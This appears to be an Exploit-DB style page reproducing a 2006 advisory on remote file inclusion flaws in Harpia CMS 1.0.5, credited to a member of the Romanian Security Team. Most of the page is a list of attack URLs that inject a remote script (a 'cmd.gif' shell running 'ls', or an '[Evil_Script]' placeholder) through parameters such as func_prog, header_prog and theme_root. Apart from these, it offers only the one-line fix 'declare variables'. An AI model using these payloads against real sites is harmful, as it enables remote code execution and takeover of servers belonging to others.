header-logo
Suggest Exploit
vendor:
Harpia CMS
by:
Kw3[R]Ln [ Romanian Security Team ]
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Harpia CMS
Affected Version From: 1.0.5
Affected Version To: 1.0.5
Patch Exists: NO
Related CWE: N/A
CPE: a:harpia_cms:harpia_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

Harpia CMS <= 1.0.5 Remote File Include Vulnerabilities

Multiple Remote File Include vulnerabilities have been discovered in Harpia CMS version 1.0.5. An attacker can exploit these vulnerabilities by sending a maliciously crafted HTTP request to the vulnerable application. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Declare variables
Source

Exploit-DB raw data:

---------------------------------------------------------------------------
Harpia CMS <= 1.0.5 Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ]
Remote : Yes
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Harpia
version : LATEST VERSION 1.0.5
URL : http://sourceforge.net/projects/harpia

------------------------------------------------------------------
Exploit:
~~~~~~~

http://www.site.com/preload.php?config=owned&func_prog=http://site.com/cmd.gif?&cmd=ls
http://www.site.com/index.php?config=owned&func_prog=http://site.com/cmd.gif?&cmd=ls
http://www.site.com/missing.php?header_prog=[Evil_Script]
http://www.site.com/_inc/footer.php?theme_root=[Evil_Script]
http://www.site.com/_inc/header.php?mod_root=[Evil_Script]
http://www.site.com/_inc/header.php?theme_root=[Evil_Script]
http://www.site.com/_inc/pfooter.php?theme_root=[Evil_Script]
http://www.site.com/_inc/pheader.php?theme_root=[Evil_Script]
http://www.site.com/_inc/web_statsConfig.php?mod_dir=[Evil_Script]
http://www.site.com/_inc/web_statsConfig.php?php_ext=[Evil_Script]
http://www.site.com/_mods/email.php?header_prog=[Evil_Script]
http://www.site.com/_mods/files.php?header_prog=[Evil_Script]
http://www.site.com/_mods/files.php?footer_prog=[Evil_Script]
http://www.site.com/_mods/headlines.php?header_prog=[Evil_Script]
http://www.site.com/_mods/search.php?header_prog=[Evil_Script]
http://www.site.com/_mods/topics.php?header_prog=[Evil_Script]
http://www.site.com/_mods/users.php?header_prog=[Evil_Script]

---------------------------------------------------------------------------


Solution :
~~~~~~~~~

declare variabels

---------------------------------------------------------------------------


Shoutz:
~~~~~

# Special greetz to my good friend [Oo]
# To all members of h4cky0u.org ;) and Romanian Security Team [ hTTp://Romania.HackTECK.BE ]
---------------------------------------------------------------------------

*/

Contact:
~~~~~~~

Nick : Kw3rLn
E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://Romania.HackTECK.BE & http://www.h4cky0u.org/
/*

-------------------------------- [ EOF] ----------------------------------

# milw0rm.com [2006-06-22]